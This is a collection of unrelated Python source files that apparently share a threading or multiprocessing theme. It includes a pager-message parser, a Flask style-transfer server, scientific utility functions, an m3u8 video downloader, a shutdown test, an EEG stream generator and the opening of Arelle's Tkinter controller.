self.messages[0].remarks += ", " + remark
if self.messages[0].region == "":
self.messages[0].region = region
self.messages[0].capcodes.append(capcode)
self.messages[0].location = location
self.messages[0].postalcode = postalcode
self.messages[0].city = city
self.messages[0].street = street
self.messages[0].address = address
else:
# After midnight (UTC), reset the opencage disable
hour = datetime.utcnow()
if (
hour.hour >= 0
and hour.minute >= 1
and hour.hour < 1
and hour.minute < 15
):
self.opencage_disabled = False
# If address is filled and OpenCage is enabled check for GPS coordinates
if (
address
and self.use_opencage
and (self.opencage_disabled is False)
and not gpscheck is True
):
geocoder = OpenCageGeocode(self.opencagetoken)
try:
gps = geocoder.geocode(address, countrycode="nl")
gpscheck = True
if gps:
latitude = gps[0]["geometry"]["lat"]
longitude = gps[0]["geometry"]["lng"]
mapurl = gps[0]["annotations"]["OSM"]["url"]
self.logger.debug(
f"OpenCage results: {latitude}, {longitude}, {mapurl}"
)
else:
latitude = ""
longitude = ""
mapurl = ""
# Rate-error check from opencage
except RateLimitExceededError as rle:
self.logger.error(rle)
# Over rate, opencage check disabled
if rle:
self.opencage_disabled = True
except InvalidInputError as ex:
self.logger.error(ex)
else:
gpscheck = False
opencage = f"enabled: {self.use_opencage} ratelimit: {self.opencage_disabled} gps-checked: {gpscheck}"
msg = MessageItem()
msg.groupid = groupid
msg.receivers = receiver
msg.capcodes = capcodes.split(" ")
msg.body = message
msg.message_raw = line.strip()
msg.disciplines = discipline
msg.priority = priority
msg.region = region
msg.location = location
msg.postalcode = postalcode
msg.longitude = longitude
msg.latitude = latitude
msg.city = city
msg.street = street
msg.address = address
msg.remarks = remark
msg.opencage = opencage
msg.mapurl = mapurl
msg.timestamp = to_local_datetime(timestamp)
msg.is_posted = False
msg.distance = distance
self.messages.insert(0, msg)
# Limit the message list size
if len(self.messages) > 100:
self.messages = self.messages[:100]
except KeyboardInterrupt:
os.kill(multimon_ng.pid, 9)
self.logger.debug("Data thread stopped")
# Thread for posting data to Home Assistant
def post_thread_call(self):
"""Thread for posting data."""
self.logger.debug("Post thread started")
while True:
if self.running is False:
break
now = time.monotonic()
for msg in self.messages:
if msg.is_posted is False and now - msg.timereceived >= 1.0:
self.post_data(msg)
time.sleep(1.0)
self.logger.debug("Post thread stopped")
# Start application
Main()
|
server.py | #
# server.py
# Style Transfer Server
#
import os
import api
import uuid
import styleopt
from PIL import Image
from flask import Flask, request
from multiprocessing import Process, Queue, Manager
## Tasking
# Style transfer worker that runs style transfers task as defined by the
# payloads queued
class TransferWorker:
def __init__(self, queue=Queue(), verbose=True):
self.queue = queue
self.verbose = verbose
# Setup shared style transfer process log
manager = Manager()
self.log = manager.dict()
# Setup worker process
self.process = Process(target=self.run)
self.process.start()
# Setup directory to generated pastiches
if not os.path.exists("static/pastiche"): os.mkdir("static/pastiche")
# Enqeue a new style transfer task parameterised by the given style
# transfer request. Returns an uuid that uniquely identifies the task
def enqueue(self, request):
# Create task for request
task_id = str(uuid.uuid4())
task = {
"request": request,
"ID": task_id
}
# Queue task for style transfer
self.log[task_id] = 0.0
self.queue.put(task)
return task_id
# Run loop of worker
def run(self):
while True:
# Perform style transfer for style transfer requst
task = self.queue.get()
request = task["request"]
task_id = task["ID"]
# Unpack style transfer request
content_image = request.content_image
style_image = request.style_image
settings = request.settings
# Perform style transfer
# Callback to record status of style transfer in worker log
def callback_status(graph, feed, i_epoch):
n_epoch = graph.settings["n_epochs"]
self.log[task_id] = i_epoch / n_epoch
if self.verbose: print("[TransferWorker]: processing task: ", task_id)
try:
pastiche_image = styleopt.transfer_style(content_image, style_image,
settings=settings,
callbacks=[styleopt.callback_progress,
styleopt.callback_tensorboard,
callback_status])
except Exception as e:
# Style transfer failed for some reason
print("[TransferWorker]: FATAL: style transfer failed for task:",
task_id)
print(repr(e))
self.log[task_id] = -1.0 # Mark failure for task in log
continue # Abadon and work on next job
# Save results of style transfer
if self.verbose: print("[TransferWorker]: completed payload: ", task_id)
pastiche_image.save("static/pastiche/{}.jpg".format(task_id))
# Check the status of the worker task specified by task_id
# Returns None if no task for the given task_id is found
# Returns -1.0 if style transfer task failed for some reason
def check_status(self, task_id):
if not task_id in self.log: return None
else: return self.log[task_id]
worker = TransferWorker()
# Server Routes
app = Flask(__name__, static_folder="static")
# Default route "/" displays server running message, used to check server if
# server is running properly
@app.route("/", methods=["GET"])
def route_test():
return app.send_static_file("test.html")
## REST API
# Rest API route "/api/style" triggers style transfer given POST style transfer
# request payload
@app.route("/api/style", methods=["POST"])
def route_api_style():
print("[REST]: /api/style")
# Read style transfer request from body
transfer_request = api.TransferRequest.parse(request.data)
# Queue request to perform style transfer on worker
task_id = worker.enqueue(transfer_request)
# Return response to requester
response = api.TransferResponse(task_id)
return response.serialise(), 200, {'ContentType':'application/json'}
# Rest API route "/api/status" retrieves the current status of style transfer
# for the given task_id.
@app.route("/api/status/<task_id>", methods=["GET"])
def route_api_status(task_id):
print("[REST]: /api/status")
# Query work current status
progress = worker.check_status(task_id)
if progress == None:
status_code = 404 # Task for the given ID not found
elif progress == -1.0:
status_code = 500 # Internal server error in style transfer
else:
status_code = 200
# Return status response to request
response = api.StatusResponse(progress)
return response.serialise(), status_code, {'ContentType':'application/json'}
# Rest API route "/api/pastiche" retrieves the pastiche
# for the given task_id.
@app.route("/api/pastiche/<task_id>", methods=["GET"])
def route_api_pastiche(task_id):
print("[REST]: /api/pastiche")
# Query work current status
progress = worker.check_status(task_id)
if progress == None:
status_code = 404 # Task for the given ID not found
return "", status_code
elif progress == -1.0:
status_code = 500 # Internal server error in style transfer
return "", status_code
elif progress >= 0.0 and progress < 1.0:
status_code = 202 # Style transfer genrated pastiche not yet ready
return "", status_code
else:
status_code = 200
return app.send_static_file("pastiche/{}.jpg".format(task_id)), status_code
# Cross origin pain in the ass
@app.after_request
def handle_cors(response):
header = response.headers
header['Access-Control-Allow-Origin'] = '*'
return response
if __name__ == "__main__":
app.run(host='0.0.0.0', port=api.SERVER_PORT)
|
misc.py | # -*- coding: utf-8 -*-
"""Some miscellaneous utility functions."""
# Authors: Alexandre Gramfort <alexandre.gramfort@inria.fr>
#
# License: BSD (3-clause)
from contextlib import contextmanager
import fnmatch
import gc
import inspect
from math import log
import os
from queue import Queue, Empty
from string import Formatter
import subprocess
import sys
from threading import Thread
import traceback
import numpy as np
from ..utils import _check_option, _validate_type
from ..fixes import _get_args
from ._logging import logger, verbose, warn
def _pl(x, non_pl=''):
"""Determine if plural should be used."""
len_x = x if isinstance(x, (int, np.generic)) else len(x)
return non_pl if len_x == 1 else 's'
def _explain_exception(start=-1, stop=None, prefix='> '):
"""Explain an exception."""
# start=-1 means "only the most recent caller"
etype, value, tb = sys.exc_info()
string = traceback.format_list(traceback.extract_tb(tb)[start:stop])
string = (''.join(string).split('\n') +
traceback.format_exception_only(etype, value))
string = ':\n' + prefix + ('\n' + prefix).join(string)
return string
def _sort_keys(x):
"""Sort and return keys of dict."""
keys = list(x.keys()) # note: not thread-safe
idx = np.argsort([str(k) for k in keys])
keys = [keys[ii] for ii in idx]
return keys
class _DefaultEventParser:
"""Parse none standard events."""
def __init__(self):
self.event_ids = dict()
def __call__(self, description, offset=1):
if description not in self.event_ids:
self.event_ids[description] = offset + len(self.event_ids)
return self.event_ids[description]
class _FormatDict(dict):
"""Help pformat() work properly."""
def __missing__(self, key):
return "{" + key + "}"
def pformat(temp, **fmt):
"""Format a template string partially.
Examples
--------
>>> pformat("{a}_{b}", a='x')
'x_{b}'
"""
formatter = Formatter()
mapping = _FormatDict(fmt)
return formatter.vformat(temp, (), mapping)
def _enqueue_output(out, queue):
for line in iter(out.readline, b''):
queue.put(line)
@verbose
def run_subprocess(command, return_code=False, verbose=None, *args, **kwargs):
"""Run command using subprocess.Popen.
Run command and wait for command to complete. If the return code was zero
then return, otherwise raise CalledProcessError.
By default, this will also add stdout= and stderr=subproces.PIPE
to the call to Popen to suppress printing to the terminal.
Parameters
----------
command : list of str | str
Command to run as subprocess (see subprocess.Popen documentation).
return_code : bool
If True, return the return code instead of raising an error if it's
non-zero.
.. versionadded:: 0.20
%(verbose)s
*args, **kwargs : arguments
Additional arguments to pass to subprocess.Popen.
Returns
-------
stdout : str
Stdout returned by the process.
stderr : str
Stderr returned by the process.
code : int
The return code, only returned if ``return_code == True``.
"""
all_out = ''
all_err = ''
# non-blocking adapted from https://stackoverflow.com/questions/375427/non-blocking-read-on-a-subprocess-pipe-in-python#4896288 # noqa: E501
out_q = Queue()
err_q = Queue()
with running_subprocess(command, *args, **kwargs) as p:
out_t = Thread(target=_enqueue_output, args=(p.stdout, out_q))
err_t = Thread(target=_enqueue_output, args=(p.stderr, err_q))
out_t.daemon = True
err_t.daemon = True
out_t.start()
err_t.start()
while True:
do_break = p.poll() is not None
# read all current lines without blocking
while True:
try:
out = out_q.get(timeout=0.01)
except Empty:
break
else:
out = out.decode('utf-8')
logger.info(out)
all_out += out
while True:
try:
err = err_q.get(timeout=0.01)
except Empty:
break
else:
err = err.decode('utf-8')
logger.warning(err)
all_err += err
if do_break:
break
p.stdout.close()
p.stderr.close()
output = (all_out, all_err)
if return_code:
output = output + (p.returncode,)
elif p.returncode:
print(output)
err_fun = subprocess.CalledProcessError.__init__
if 'output' in _get_args(err_fun):
raise subprocess.CalledProcessError(p.returncode, command, output)
else:
raise subprocess.CalledProcessError(p.returncode, command)
return output
@contextmanager
def running_subprocess(command, after="wait", verbose=None, *args, **kwargs):
"""Context manager to do something with a command running via Popen.
Parameters
----------
command : list of str | str
Command to run as subprocess (see :class:`python:subprocess.Popen`).
after : str
Can be:
- "wait" to use :meth:`~python:subprocess.Popen.wait`
- "communicate" to use :meth:`~python.subprocess.Popen.communicate`
- "terminate" to use :meth:`~python:subprocess.Popen.terminate`
- "kill" to use :meth:`~python:subprocess.Popen.kill`
%(verbose)s
*args, **kwargs : arguments
Additional arguments to pass to subprocess.Popen.
Returns
-------
p : instance of Popen
The process.
"""
_validate_type(after, str, 'after')
_check_option('after', after, ['wait', 'terminate', 'kill', 'communicate'])
for stdxxx, sys_stdxxx in (['stderr', sys.stderr], ['stdout', sys.stdout]):
if stdxxx not in kwargs:
kwargs[stdxxx] = subprocess.PIPE
# Check the PATH environment variable. If run_subprocess() is to be called
# frequently this should be refactored so as to only check the path once.
env = kwargs.get('env', os.environ)
if any(p.startswith('~') for p in env['PATH'].split(os.pathsep)):
warn('Your PATH environment variable contains at least one path '
'starting with a tilde ("~") character. Such paths are not '
'interpreted correctly from within Python. It is recommended '
'that you use "$HOME" instead of "~".')
if isinstance(command, str):
command_str = command
else:
command = [str(s) for s in command]
command_str = ' '.join(s for s in command)
logger.info("Running subprocess: %s" % command_str)
try:
p = subprocess.Popen(command, *args, **kwargs)
except Exception:
if isinstance(command, str):
command_name = command.split()[0]
else:
command_name = command[0]
logger.error('Command not found: %s' % command_name)
raise
try:
yield p
finally:
getattr(p, after)()
p.wait()
def _clean_names(names, remove_whitespace=False, before_dash=True):
"""Remove white-space on topo matching.
This function handles different naming
conventions for old VS new VectorView systems (`remove_whitespace`).
Also it allows to remove system specific parts in CTF channel names
(`before_dash`).
Usage
-----
# for new VectorView (only inside layout)
ch_names = _clean_names(epochs.ch_names, remove_whitespace=True)
# for CTF
ch_names = _clean_names(epochs.ch_names, before_dash=True)
"""
cleaned = []
for name in names:
if ' ' in name and remove_whitespace:
name = name.replace(' ', '')
if '-' in name and before_dash:
name = name.split('-')[0]
if name.endswith('_v'):
name = name[:-2]
cleaned.append(name)
return cleaned
def _get_argvalues():
"""Return all arguments (except self) and values of read_raw_xxx."""
# call stack
# read_raw_xxx -> <decorator-gen-000> -> BaseRaw.__init__ -> _get_argvalues
# This is equivalent to `frame = inspect.stack(0)[4][0]` but faster
frame = inspect.currentframe()
try:
for _ in range(3):
frame = frame.f_back
fname = frame.f_code.co_filename
if not fnmatch.fnmatch(fname, '*/mne/io/*'):
return None
args, _, _, values = inspect.getargvalues(frame)
finally:
del frame
params = dict()
for arg in args:
params[arg] = values[arg]
params.pop('self', None)
return params
def sizeof_fmt(num):
"""Turn number of bytes into human-readable str.
Parameters
----------
num : int
The number of bytes.
Returns
-------
size : str
The size in human-readable format.
"""
units = ['bytes', 'kB', 'MB', 'GB', 'TB', 'PB']
decimals = [0, 0, 1, 2, 2, 2]
if num > 1:
exponent = min(int(log(num, 1024)), len(units) - 1)
quotient = float(num) / 1024 ** exponent
unit = units[exponent]
num_decimals = decimals[exponent]
format_string = '{0:.%sf} {1}' % (num_decimals)
return format_string.format(quotient, unit)
if num == 0:
return '0 bytes'
if num == 1:
return '1 byte'
def _file_like(obj):
# An alternative would be::
#
# isinstance(obj, (TextIOBase, BufferedIOBase, RawIOBase, IOBase))
#
# but this might be more robust to file-like objects not properly
# inheriting from these classes:
return all(callable(getattr(obj, name, None)) for name in ('read', 'seek'))
def _assert_no_instances(cls, when=''):
__tracebackhide__ = True
n = 0
ref = list()
gc.collect()
objs = gc.get_objects()
for obj in objs:
try:
check = isinstance(obj, cls)
except Exception: # such as a weakref
check = False
if check:
rr = gc.get_referrers(obj)
count = 0
for r in rr:
if r is not objs and \
r is not globals() and \
r is not locals() and \
not inspect.isframe(r):
ref.append(
f'{r.__class__.__name__}: ' +
repr(r)[:100].replace('\n', ' '))
count += 1
del r
del rr
n += count > 0
assert n == 0, f'{n} {when}:\n' + '\n'.join(ref)
|
download_m3u8.py | #!/usr/bin/env python
# -*- coding:utf-8 -*
# ############################################################
#
# Copyright (c) 2020 xxx.com, Inc. All Rights Reserved
#
# ############################################################
'''
@Date: 2020-03-15 16:14:35
@Author: tf
@LastEditTime: 2020-03-19 00:08:18
@LastEditors: tianfeng04
@Description:
'''
import argparse
import datetime
import hashlib
import re
import requests
import shutil
import threading
import os
from queue import Queue
class Downloadm3u8(object):
"""
download m3u8
Arguments:
object {[type]} -- [description]
"""
def __init__(self, thread_num):
"""
init
Arguments:
object {[type]} -- [description]
thread_num {[type]} -- [description]
"""
self.__thread_num = thread_num
self.__tmp_dir = './cache'
def __down_m3u8_file(self, m3u8_url):
"""
download m3u8 file
Arguments:
m3u8_url {[type]} -- [description]
Returns:
[type] -- [description]
"""
resp = requests.get(m3u8_url)
m3u8_text = resp.text
ts_queue = Queue(10000)
lines = m3u8_text.split('\n')
base_download_url = os.path.dirname(m3u8_url)
local_m3u8_path = os.path.join(self.__tmp_dir, "local.m3u8")
index = 0
contents = []
key_url = None
for line in lines:
if re.search('URI=', line):
p1 = re.compile(r'URI=["](.*?)["]', re.S)
key_url = re.findall(p1, line)[0]
if re.match('^#', line) or len(line) < 10:
contents.append(line + os.linesep)
continue
index += 1
file_url = os.path.join(base_download_url, line)
file_name = str(index).zfill(6) + ".ts"
ts_queue.put([file_url, file_name])
contents.append(file_name + os.linesep)
# if key_url exist, download
key_name = ''
if key_url:
ret = requests.get(key_url)
key_name = hashlib.md5(key_url.encode()).hexdigest() + ".key"
key_path = os.path.join(self.__tmp_dir, key_name)
with open(key_path, 'wb') as f:
f.write(ret.content)
f.close()
# if key_url exist, update key_url by local_url
for index, line in enumerate(contents):
if re.search('URI=', line):
p1 = re.compile(r'URI=["](.*?)["]', re.S)
key_url = re.findall(p1, line)[0]
line = line.replace(key_url, key_name)
contents[index] = line
# update m3u8
with open(local_m3u8_path, 'w') as f:
for line in contents:
f.write(line)
f.close()
return ts_queue, local_m3u8_path
def __thread_download_ts(self, ts_queue):
tt_name = threading.current_thread().getName()
while not ts_queue.empty():
ts_obj = ts_queue.get()
ts_url = ts_obj[0]
filename = ts_obj[1]
r = requests.get(ts_url, stream=True)
ts_local_path = os.path.join(self.__tmp_dir, filename)
if os.path.exists(ts_local_path):
continue
with open(ts_local_path, 'wb') as fp:
for chunk in r.iter_content(5242):
if chunk:
fp.write(chunk)
print("[{}]: src: {} --> dst: {} succeed.".format(tt_name, ts_url, ts_local_path))
def __merge_ts_by_ffmepg(self, local_m3u8_path, video_name):
"""
merge *.ts by ffmepg
Arguments:
concatfile {[type]} -- [description]
name {[type]} -- [description]
"""
try:
command = 'ffmpeg -allowed_extensions ALL -i {} -c copy -y {}'.format(local_m3u8_path, video_name)
print(command)
os.system(command)
print('merge succeed.')
except:
print('merge failed.')
def run(self, m3u8_url, video_name):
"""
download video
Arguments:
m3u8_url {[type]} -- [description]
video_name {[type]} -- [description]
"""
if not os.path.exists(self.__tmp_dir):
os.makedirs(self.__tmp_dir)
s, local_m3u8_path = self.__down_m3u8_file(m3u8_url=m3u8_url)
start_time = datetime.datetime.now().replace(microsecond=0)
threads = []
for i in range(self.__thread_num):
t = threading.Thread(target=self.__thread_download_ts, name='th-'+str(i), kwargs={'ts_queue': s})
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join()
end_time = datetime.datetime.now().replace(microsecond=0)
print('dowonload consuming: {}'.format(end_time - start_time))
start_time = datetime.datetime.now().replace(microsecond=0)
self.__merge_ts_by_ffmepg(local_m3u8_path=local_m3u8_path, video_name=video_name)
end_time = datetime.datetime.now().replace(microsecond=0)
print("merge consuming: {}".format(end_time - start_time))
shutil.rmtree(self.__tmp_dir)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--version', action='version',
version='%(prog)s version : v0.0.1', help='show the version')
parser.add_argument("--m3u8_url", "-m", type=str, help='download m3u8 url')
parser.add_argument("--video_name", "-v", type=str, help="vido name like 0001.mp4")
parser.add_argument("--num_thread", "-n", type=int, default=8, help="thread nums")
args = parser.parse_args()
m3u8_url = args.m3u8_url
video_name = args.video_name
thread_num = args.num_thread
if thread_num < 0:
thread_num = 16
Downloadm3u8(thread_num=thread_num).run(m3u8_url=m3u8_url, video_name=video_name)
|
test_service_and_endpoint_shutdown_utils.py | import asyncio
import multiprocessing
import os
import signal
import pytest
from p2p.service import BaseService
from trinity.endpoint import TrinityEventBusEndpoint
from trinity._utils.shutdown import (
exit_with_endpoint_and_services,
)
class SimpleService(BaseService):
def __init__(self, ready_to_kill_event, *args, **kwargs):
super().__init__(*args, **kwargs)
self.ready_to_kill_event = ready_to_kill_event
async def _run(self):
self.ready_to_kill_event.set()
await self.cancellation()
def run_service(ready_to_kill_event):
loop = asyncio.get_event_loop()
endpoint = TrinityEventBusEndpoint("dummy")
service = SimpleService(ready_to_kill_event, loop=loop)
asyncio.ensure_future(exit_with_endpoint_and_services(endpoint, service))
asyncio.ensure_future(service.run())
loop.run_forever()
loop.close()
assert service.is_cancelled
assert endpoint._running is False
@pytest.mark.parametrize('sig', (signal.SIGINT, signal.SIGTERM))
@pytest.mark.asyncio
async def test_exit_with_endpoind_and_services_facilitates_clean_shutdown(sig):
ready_to_kill_event = multiprocessing.Event()
proc = multiprocessing.Process(target=run_service, args=(ready_to_kill_event,))
proc.start()
ready_to_kill_event.wait()
os.kill(proc.pid, sig)
proc.join(timeout=1)
|
manage.py | # Copyright 2017 Hewlett Packard Enterprise Development LP
# Copyright 2017 Universidade Federal de Campina Grande
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from multiprocessing import Process
from oslo_log import log as logging
from ironic_oneviewd.facade import Facade
from ironic_oneviewd.inventory_manager.manage import InventoryManager
from ironic_oneviewd.node_manager.manage import NodeManager
LOG = logging.getLogger(__name__)
def do_oneview_daemon():
"""Ironic OneView Daemon."""
LOG.info('Starting Ironic OneView Daemon')
facade = Facade()
node_manager = NodeManager(facade)
inventory_manager = InventoryManager(facade)
def execute():
process1 = Process(target=node_manager.run)
process1.start()
process2 = Process(target=inventory_manager.run)
process2.start()
process1.join()
process2.join()
execute()
|
pref_rps.py | from threading import Thread
import socket
import time
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('localhost', 1234))
sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
n = 0
status = True
def monitor():
global n, status
while status:
time.sleep(1)
print(n, 'reqs/sec')
n = 0
Thread(target=monitor).start()
while True:
try:
sock.send(b'1')
resp = sock.recv(100)
n += 1
except:
break
status = False
sock.close()
|
monadic.py | # Shamelessly copy/pasted from this awesome article :
# https://www.toptal.com/javascript/option-maybe-either-future-monads-js*
# by Alexey Karasev
import threading
from functools import reduce
class Monad:
# pure :: a -> M a. Same as unit: a -> M a
@staticmethod
def pure(x):
raise Exception("pure method needs to be implemented")
# flat_map :: # M a -> (a -> M b) -> M b
def flat_map(self, f):
raise Exception("flat_map method needs to be implemented")
# map :: # M a -> (a -> b) -> M b
def map(self, f):
return self.flat_map(lambda x: self.pure(f(x)))
class Option(Monad):
# pure :: a -> Option a
@staticmethod
def pure(x):
return Some(x)
# flat_map :: # Option a -> (a -> Option b) -> Option b
def flat_map(self, f):
if self.defined:
return f(self.value)
else:
return nil
class Some(Option):
def __init__(self, value):
self.value = value
self.defined = True
class Nil(Option):
def __init__(self):
self.value = None
self.defined = False
nil = Nil()
class Either(Monad):
# pure :: a -> Either a
@staticmethod
def pure(value):
return Right(value)
# flat_map :: # Either a -> (a -> Either b) -> Either b
def flat_map(self, f):
if self.is_left:
return self
else:
return f(self.value)
class Left(Either):
def __init__(self, value):
self.value = value
self.is_left = True
class Right(Either):
def __init__(self, value):
self.value = value
self.is_left = False
class Future(Monad):
# __init__ :: ((Either err a -> void) -> void) -> Future (Either err a)
def __init__(self, f):
self.subscribers = []
self.cache = nil
self.semaphore = threading.BoundedSemaphore(1)
f(self.callback)
# pure :: a -> Future a
@staticmethod
def pure(value):
return Future(lambda cb: cb(Either.pure(value)))
def exec(f, cb):
try:
data = f()
cb(Right(data))
except Exception as err:
cb(Left(err))
def exec_on_thread(f, cb):
t = threading.Thread(target=Future.exec, args=[f, cb])
t.start()
def asyn(f):
return Future(lambda cb: Future.exec_on_thread(f, cb))
# flat_map :: (a -> Future b) -> Future b
def flat_map(self, f):
return Future(
lambda cb: self.subscribe(
lambda value: cb(value)
if (value.is_left)
else f(value.value).subscribe(cb)
)
)
# traverse :: [a] -> (a -> Future b) -> Future [b]
def traverse(arr):
return lambda f: reduce(
lambda acc, elem: acc.flat_map(
lambda values: f(elem).map(lambda value: values + [value])
),
arr,
Future.pure([]),
)
# callback :: Either err a -> void
def callback(self, value):
self.semaphore.acquire()
self.cache = Some(value)
while len(self.subscribers) > 0:
sub = self.subscribers.pop(0)
t = threading.Thread(target=sub, args=[value])
t.start()
self.semaphore.release()
# subscribe :: (Either err a -> void) -> void
def subscribe(self, subscriber):
self.semaphore.acquire()
if self.cache.defined:
self.semaphore.release()
subscriber(self.cache.value)
else:
self.subscribers.append(subscriber)
self.semaphore.release()
|
samplegeneration.py | from threading import current_thread, Thread
import numpy as np
import random, sys, os
import string, time
from .xdf import load_xdf
from pylsl import local_clock, StreamInfo, StreamOutlet
RANDOM_CHN = 16
class SampleGeneration:
def __init__(self, mode):
self.mode = mode
self.thread = None
self.running = False
# initialize
self.outlets = []
self.sample_rate = None
self.num_streams = None
if mode == "random":
self.sample_rate = 60.0
self.num_streams = 2
self._outlet()
def start(self):
if self.thread:
return False
self.thread = Thread(target=self._update, daemon=True, name="SendingData")
self.running = True
self.thread.start()
return True
def stop(self):
if not self.thread:
return True
self.running = False
if current_thread() is not self.thread:
self.thread.join()
self.thread = None
return True
def _outlet(self):
if self.mode == "random":
colors = ['Purple', 'Orange', 'Green', 'Blue', 'Black', 'White']
for num in range(self.num_streams):
letters = string.digits
id = ''.join(random.choice(letters) for i in range(4))
uid = str(colors[num]) + '-' + id
info = StreamInfo('EEG-{}'.format(uid), 'EEG', RANDOM_CHN, self.sample_rate, 'float32', uid)
self.outlets.append(StreamOutlet(info))
else:
# filepath = self.resource_path('support/session_2020_02_21_14_21_11_anticipation.xdf') # TODO
filepath = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'session_2020_02_21_14_21_11_anticipation.xdf')
raw_file = load_xdf(filepath, synchronize_clocks=False, dejitter_timestamps=False, verbose=False)[0]
raw_file = [f for f in raw_file if 'EEG' in f['info']['name'][0]]
# defining output streams
for i, person in enumerate(raw_file):
id = person['info']['source_id']
info = StreamInfo(person['info']['name'][0], person['info']['type'][0],
int(person['info']['channel_count'][0]),
int(person['info']['nominal_srate'][0]), person['info']['channel_format'][0], id[0])
self.outlets.append(StreamOutlet(info))
def _update(self):
while self.running:
if self.mode == 'random':
ts = local_clock()
for outlet in self.outlets:
sample = list(np.random.rand(RANDOM_CHN))
outlet.push_sample(sample, timestamp=ts)
time.sleep(1.0 / self.sample_rate)
else:
# filepath = self.resource_path('support/session_2020_02_21_14_21_11_anticipation.xdf') # TODO
filepath = os.path.join(os.path.dirname(os.path.abspath(__file__)),
'session_2020_02_21_14_21_11_anticipation.xdf')
raw_file = load_xdf(filepath, synchronize_clocks=False, dejitter_timestamps=False, verbose=False)[0]
raw_file = [f for f in raw_file if 'EEG' in f['info']['name'][0]]
# defining output streams
data = []
for i, person in enumerate(raw_file):
id = person['info']['source_id']
raw = person['time_series'].T
data.append(raw)
print("now sending data...")
length = min([d.shape[1] for d in data])
for i in range(length):
ts = local_clock()
for subject, outlet in enumerate(self.outlets):
outlet.push_sample(data[subject][:, i], timestamp=ts)
time.sleep(0.004)
def resource_path(self, relative_path):
if hasattr(sys, '_MEIPASS'):
return os.path.join(sys._MEIPASS, relative_path)
return os.path.join(os.path.abspath("."), relative_path) |
CntlrWinMain.py | '''
Created on Oct 3, 2010
This module is Arelle's controller in windowing interactive UI mode
@author: Mark V Systems Limited
(c) Copyright 2010 Mark V Systems Limited, All rights reserved.
'''
from arelle import PythonUtil # define 2.x or 3.x string types
import os, sys, subprocess, pickle, time, locale, re
from tkinter import (Tk, TclError, Toplevel, Menu, PhotoImage, StringVar, BooleanVar, N, S, E, W, EW,
HORIZONTAL, VERTICAL, END)
try:
from tkinter.ttk import Frame, Button, Label, Combobox, Separator, PanedWindow, Notebook
except ImportError: # 3.0 versions of tkinter
from ttk import Frame, Button, Label, Combobox, Separator, PanedWindow, Notebook
import tkinter.tix
import tkinter.filedialog
import tkinter.messagebox, traceback
from arelle.Locale import format_string
from arelle.CntlrWinTooltip import ToolTip
from arelle import XbrlConst
from arelle.PluginManager import pluginClassMethods
from arelle.UrlUtil import isHttpUrl
import logging
import threading, queue
from arelle import Cntlr
from arelle import (DialogURL, DialogLanguage,
DialogPluginManager, DialogPackageManager,
ModelDocument,
ModelManager,
RenderingEvaluator,
ViewWinDTS,
ViewWinProperties, ViewWinConcepts, ViewWinRelationshipSet, ViewWinFormulae,
ViewWinFactList, ViewWinFactTable, ViewWinRenderedGrid, ViewWinXml,
ViewWinRoleTypes, ViewFileRoleTypes, ViewFileConcepts,
ViewWinTests, ViewWinTree, ViewWinVersReport, ViewWinRssFeed,
ViewFileTests,
ViewFileRenderedGrid,
ViewFileRelationshipSet,
Updater
)
from arelle.ModelFormulaObject import FormulaOptions
from arelle.FileSource import openFileSource
restartMain = True
class CntlrWinMain (Cntlr.Cntlr):
def __init__(self, parent):
super(CntlrWinMain, self).__init__(hasGui=True)
self.parent = parent
self.filename = None
self.dirty = False
overrideLang = self.config.get("labelLangOverride")
self.labelLang = overrideLang if overrideLang else self.modelManager.defaultLang
self.data = {}
tkinter.CallWrapper = TkinterCallWrapper
imgpath = self.imagesDir + os.sep
if self.isMSW:
icon = imgpath + "arelle.ico"
parent.iconbitmap(icon, default=icon)
#image = PhotoImage(file=path + "arelle32.gif")
#label = Label(None, image=image)
#parent.iconwindow(label)
else:
parent.iconbitmap("@" + imgpath + "arelle.xbm")
# try with gif file
#parent.iconbitmap(path + "arelle.gif")
self.menubar = Menu(self.parent)
self.parent["menu"] = self.menubar
self.fileMenu = Menu(self.menubar, tearoff=0)
self.fileMenuLength = 1
for label, command, shortcut_text, shortcut in (
#(_("New..."), self.fileNew, "Ctrl+N", "<Control-n>"),
(_("Open File..."), self.fileOpen, "Ctrl+O", "<Control-o>"),
(_("Open Web..."), self.webOpen, "Shift+Alt+O", "<Shift-Alt-o>"),
(_("Import File..."), self.importFileOpen, None, None),
(_("Import Web..."), self.importWebOpen, None, None),
("PLUG-IN", "CntlrWinMain.Menu.File.Open", None, None),
(_("Save..."), self.fileSave, "Ctrl+S", "<Control-s>"),
(_("Save DTS Package"), self.saveDTSpackage, None, None),
("PLUG-IN", "CntlrWinMain.Menu.File.Save", None, None),
(_("Close"), self.fileClose, "Ctrl+W", "<Control-w>"),
(None, None, None, None),
(_("Quit"), self.quit, "Ctrl+Q", "<Control-q>"),
#(_("Restart"), self.restart, None, None),
(None, None, None, None),
("",None,None,None) # position for file history
):
if label is None:
self.fileMenu.add_separator()
elif label == "PLUG-IN":
for pluginMenuExtender in pluginClassMethods(command):
pluginMenuExtender(self, self.fileMenu)
else:
self.fileMenu.add_command(label=label, underline=0, command=command, accelerator=shortcut_text)
self.parent.bind(shortcut, command)
self.fileMenuLength += 1
self.loadFileMenuHistory()
self.menubar.add_cascade(label=_("File"), menu=self.fileMenu, underline=0)
toolsMenu = Menu(self.menubar, tearoff=0)
validateMenu = Menu(self.menubar, tearoff=0)
toolsMenu.add_cascade(label=_("Validation"), menu=validateMenu, underline=0)
validateMenu.add_command(label=_("Validate"), underline=0, command=self.validate)
self.modelManager.validateDisclosureSystem = self.config.setdefault("validateDisclosureSystem",False)
self.validateDisclosureSystem = BooleanVar(value=self.modelManager.validateDisclosureSystem)
self.validateDisclosureSystem.trace("w", self.setValidateDisclosureSystem)
validateMenu.add_checkbutton(label=_("Disclosure system checks"), underline=0, variable=self.validateDisclosureSystem, onvalue=True, offvalue=False)
